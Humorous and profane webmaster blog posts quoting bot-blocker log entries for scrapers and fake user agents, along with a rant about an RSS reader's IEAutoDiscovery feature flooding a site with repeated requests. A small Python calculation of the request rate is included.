Did you notice Harry stutters?

That's because he keeps asking for my domain without the WWW so he gets a redirect and then hits the bot blocker head on.
203.6.205.34 [203-6-205-34.reed-elsevier.com.au.]
Now that you know Harry is an Aussie the title will make more sense. ;)

Needless to say, I'm NOT just wild about Harry.

Bot Blockers Beware! New UK Threat!

When I saw this in my bot blocker's log today it sent shivers down my spine.

What evil genius came up with this?

217.206.231.140 "fake_user_agent Mozilla/9.0 (compatible; MSIE)"
I'm not sure we can stop this one...

French Speaking Scrapers Needed - Apply Within

This morning I found this little French gem sitting in the bot blocker's Inbox direct from optioncarriere.com which appears to be a crawler looking for job listings.

First they tried libwww:

193.238.230.109 "GET / " "libwww-perl/5.805"
193.238.230.109 "GET / " "libwww-perl/5.805"
193.238.230.109 "GET / " "libwww-perl/5.805"
193.238.230.109 "GET / " "libwww-perl/5.805"
Sacrebleu! Zee LEEB WWW duz not wurk!

VITE! VITE! Youze zee Mozeeluh!
193.238.230.109 "GET / " "Mozilla/5.0 (compatible)"
Merde!

Sunday, January 06, 2008

Active Web Reader Causes IEAutoDiscovery Hell

Installed this RSS feed reader called Active Web Reader on the Vista laptop the other day and it went off hammering my server with requests from "IEAutoDiscovery" that resembled a fucking DoS on one of my websites.

At first I thought I'd just been fucked over with malware in the download until I remembered what it said on their web site:

"Active Web Reader has a unique feature, called Auto Discovery, that automatically discovers RSS feeds while you browse the Internet using Internet Explorer."
Auto Discovery my ass, this is Auto Denial of Service attack!
xx.xx.xx - - [17:53:40] "GET /somepage.html" "IEAutoDiscovery"

... shitload of requests sometimes hitting 2 and 3 pages per second

xx.xx.xx - - [18:31:17] "GET /somepage.html" "IEAutoDiscovery"
Maybe it malfunctioned in Vista, who knows, because I've never seen IEAutoDiscovery run amok like this before, but in less than 40 minutes this fucking thing pulled down 647 pages when the site has less than 50. That means this tool kept hammering the same pages over and over and over, ever hear of the word CACHE?

Fuck me.

Uninstalled and I'll never touch anything from them again.
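
For a sense of scale, the numbers above work out as follows. A quick Python calculation, assuming the two timestamps shown in the log excerpt bracket the whole run and using 50 as the upper bound for the site's page count:

```python
from datetime import datetime

# First and last timestamps from the log excerpt above.
first = datetime.strptime("17:53:40", "%H:%M:%S")
last = datetime.strptime("18:31:17", "%H:%M:%S")
seconds = (last - first).total_seconds()

PAGES_FETCHED = 647
SITE_PAGES = 50  # upper bound; the site has fewer pages than this

print(f"duration: {seconds / 60:.1f} minutes")
print(f"average rate: {PAGES_FETCHED / seconds * 60:.1f} pages per minute")
print(f"fetches per page: at least {PAGES_FETCHED / SITE_PAGES:.1f}")
```

The average hides the bursts of 2 and 3 pages per second, but even averaged out every page on the site got pulled a dozen times or more.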